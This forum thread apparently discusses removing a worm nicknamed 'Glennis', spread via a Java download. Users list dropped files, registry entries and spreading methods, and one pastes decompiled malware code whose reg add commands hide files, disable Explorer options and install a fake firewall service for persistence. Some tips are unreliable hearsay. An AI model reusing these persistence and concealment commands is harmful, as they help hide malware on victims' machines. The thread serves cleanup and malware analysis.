Removing Glennis Virus

[Nikita]

I'm so happy I didn't install Java plugin here :3

[adadr]

OMG I JUST FOUND THIS ON MY COMP T_T lucky i didnt loose anything like my steam. in the folders i did find world of warcraft so i hope my wow account didnt get stolen.

[turck3]

Wouldnt best way to find all things it did be to get the virus into a clean computer/emulated clean computer and then keep track of everything that changes upon getting it?

Except nobody here has a computer like that (or if they do they aren't willing to make the attempt).... I fall into the latter category....

But yes, that would be helpful. Don't worry bout it, Faron has submitted a report to Symantec.

[xr34p3rx]

the run the java downloaded is located here -snip- dont dowload it it is a virus im just saying for disassembling purposes

PM -HP- for a link - This has already caused enough havok.

[SystemsLock]

I am also rather sure that svcmon.exe is also part of the virus. Go to C:\Windows\System32\svcmon and delete the files in the folder.

[mmavipc]

Yay! I feel so happy! I'm the one who found proof first that it was a virus! But what worries me is, GMod lua can have html pages. These html pages can run java. Java can give you viruses. GMod is not virus protected?

Edit: And oh yeah, Glenni is a giant dumbass(I know 5 ways how he could have made the virus extremely painful to delete)

IT GETS INTO YOUR MSN MESSENGER TOO!
C:\\WINDOWS\\system32\\dllcache\\tmp.exe is also part of the virus
and C:\\WINDOWS\\system32\\dllcache\\temp.exe

It also uses limewire to spread "windows_7full.scr"
which is located in programfiles\\Shared\\

Virus: C:\\WINDOWS\\system32\\drivers\\temp123.exe
Virus : C:\\WINDOWS\\system32\\temp.exe
Virus: recycler\\S-1-5-21-8749679017-0950430147-468708784-3200\\recycler.scr
virus: C:\\WINDOWS\\system32\\dllcache\\recycled.exe
virus : C:\\WINDOWS\\system32\\dllcache\\myporn.scr
virus: C:\\WINDOWS\\system32\\dllcache\\doc.pif
virus: C:\\windows\\system32\\drivers\\svchost.exe(I'ts not normally there)
virus : C:\\windows\\system32\\drivers\\tmpp.exe
[trys to infect]
virus: C:\\windows\\system32\\drivers\\tmpp.exe
Check your C:\windows\explorer.exe for (-Two-Binded-Files-From-Nathan72389s-Free-Example-Binder-)
virus: C:\\WINDOWS\\system32\\dllcache\\stub.exe
virus: C:\\WINDOWS\\system32\\dllcache\\recycled.exe
All of your autorun.inf
[/trys to infect]
Virus : C:\\windows\\system32\\winlogon.scr
Check your HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\9. 0\\Outlook\\Security for a entry called Level1Add if ti contains ".exe,.pif,.exe" Delet it
Check your HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Con trol\\Lsa for a entry called UAC with a value of "C:\\WINDOWS\\system32\\dllcache\\svchost.exe" Delete it(It's not on my system)

Check HKEY_CURRENT_USER\\Software\\Microsoft\\OLE for a entry called UAC with a value of "C:\\windows\\system32\\drivers\\svchost.exe" Delete it(it's not on my system)

Check HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon entry "Shell" DO NOT DELETE THIS! If it contains anything other than explorer.exe set the whole entire thing to "explorer.exe" DO NOT DELETE IT! THIS WOULD CAUSE YOUR SYSTEM TO MALFUNCTION

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon entry "UIHost" What it should be: "logonui.exe"

Virus : C:\\windows\\system32\\net.vbs
Virus : C:\\windows\\system32\\launch.vbs
Virus : C:\\windows\\system32\\launch.bat
Check for C:\\windows\\system32\\logg.txt PM me the contents(Remove any sensitive info like passwords i'm not looking for that kind of shit) and then delete it

virus : C:\\WINDOWS\\system32\\drivers\\Interop.MessengerA PI.dl
virus : C:\\WINDOWS\\system32\\dllcache\\Interop.Messenger API.dll
virus : C:\\WINDOWS\\system32\\pptemp.txt
virus:C:\\windows\\system32\\tmp.dll

Check your %windir%\\system32\\drivers\\etc\\hosts for any suspicious entries(like 127.0.0.1 antivir.de) Delete the entries but not the file

Virus: %windir%\\system32\\13l.dll
Virus : %windir%\\system32\\pbrl.vbs

It also tries to send email to everyone with your outlook with a mesage body of ""Hello , could you take a look to my picture i have taken some days ago?" and a subject of "HEY" Delete any messages you get and tlel your firends to delete those messages too

That's all the settings it changes

Code:

ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"HideFileExt\" /t \"REG_DWORD\" /d 1 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"Hidden\" /t \"REG_DWORD\" /d 2 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoFind\" /t \"REG_DWORD\" /d 1 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoFolderOptions\" /t \"REG_DWORD\" /d 1 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"SuperHidden\" /t \"REG_DWORD\" /d 0 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"ShowSuperHidden\" /t \"REG_DWORD\" /d 0 /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)

PM me the contents of %windir%\\teemp.txt then delete it(remove sensitive info)

Virus: %%t\\readme.scr

Remove senseitive info from %windir%/tmp.log PM me the contents and delete it

Virus: C:\\start.exe
Virus: %windir%\\temp.dat
Virus: %%n\\windows_7_full.exe
Virus: %windir%\\temp.dtx
Virus: %%y\\windows_7_full.exe
Virus: %windir%\\tam.dl

It also adds user accounts

Virus: %windir%\\teest.txt
Check your netbios shared folders for funny.scr, and LOOL.pif delete them

Virus: %%g\\%%v\\STUPID.scr
Virus: %windir%\\input123.blp
virus: %windir%\\teest.txt

Check all of your p2p sharing programs

virus: Microsoft\\Messenger\\porn_(Anything can be here, it's random).sc
Virus: %windir%\\system32\\tomp.txt


My lazyness is going tolet you figure otu what this code does

Code:

 ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ImagePath\" /t \"REG_EXPAND_SZ\" /d \"C:\\windows\\system32\\drivers\\svchost.exe\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"DisplayName\" /d \"Default Windows Firewall\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ObjectName\"  /d \"LocalSystem\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"Start\" /t REG_DWORD /d \"2\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ErrorControl\" /t REG_DWORD /d \"0\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"Type\" /t REG_DWORD /d \"110\" /f"
    callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
    ldloc.s 0xA
    ldstr "reg add  \"HKEY_CURRENT_USER\\Software\\Patchou\\Messenger Plus! Live\\GlobalSettings\\Scripts\\MSN PLUS\" /v background /d "
    ldarg.0

If you use the autoit scripting language all of your include files are infected!

Virus: %windir%\\system32\\sys.bat

CHECK YOUR MIRC INI FILES

Virus: %windir%\\ftp

Tries to stop McAffe firewall

Virus: C:\\windows\\system32\\s4c.vbs

It tries to hijack skype

Another attemp to hack messenger

Code:

    ldstr "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\MessengerService\\Policies"
    ldstr "IMWarning"
    ldstr "(M)Warning: The person who you are talking to is infected with a virus. Send him the removal tool that can be found in"
    ldarg.0

ldstr "HKEY_CURRENT_USER\\Software\\Yahoo\\pager\\View\\ YMSGR_buzz"
ldstr "content url"
Kill it

In your temp files youll have win_update.exe DELETE it

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon Entry "UserInit" set it to "C:\\WINDOWS\\SYSTEM32\\Userinit.exe"

And that's all I can get from server.exe
If you have any of the other virus file's handy upload them somewhere and PM me a link

[turck3]

Yay! I feel so happy! I'm the one who found proof first that it was a virus! But what worries me is, GMod lua can have html pages. These html pages can run java. Java can give you viruses. GMod is not virus protected?

Edit: And oh yeah, Glenni is a giant dumbass(I know 5 ways how he could have made the virus undeletable)

1. Then you better hope that he doesn't own a server - and if he does - report it to Valve immediately.
2. Nothing cannot be removed. Nothing; just need to have the tools of the trade (I work as a professional computer repair specialist).

[DanKing]

I'm so happy that I didn't bother to download that game, I was in Germany at that time.

blah blah blah
2. Nothing cannot be removed. Nothing; just need to have the tools of the trade (I work as a professional computer repair specialist).

Reminds me of a virus I once had, was next to impossible to remove, so I tried something stupid:
Open the file in notepad.
Select everything and just type "stupid virus!!".
Hit save.

Guess what: it worked!

[feha]

danking, thats the best story I ever heard of removing a virus XD.

[Drunkie]

A popup asked me if I wanted to install a plugin before trying it and I said no, so I guess It didnt affect me. Also I have vista 64-bit if that helps, and I'm gonna do a full virus scan with AVG and SpyBot (Search and Destroy) which is a good application.